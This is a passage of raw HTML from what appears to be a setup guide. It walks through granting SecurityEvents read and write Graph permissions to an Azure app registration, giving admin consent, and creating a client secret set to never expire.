data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="auto">Search for 'SecurityEvents', Check&nbsp;<STRONG>SecurityEvents.Read.All</STRONG></SPAN><SPAN data-contrast="auto">&nbsp; and <STRONG>SecurityEvents.ReadWrite.All</STRONG> and 'Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">Add&nbsp;permissions</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto">.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="auto">Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">grant&nbsp;admin consent</SPAN><SPAN data-contrast="auto">’.</SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="auto">Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">Certificates and Secrets</SPAN><SPAN data-contrast="auto">’.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="auto">Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">New Client&nbsp;Secret</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="auto">Enter a description, select&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">never</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto">. Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">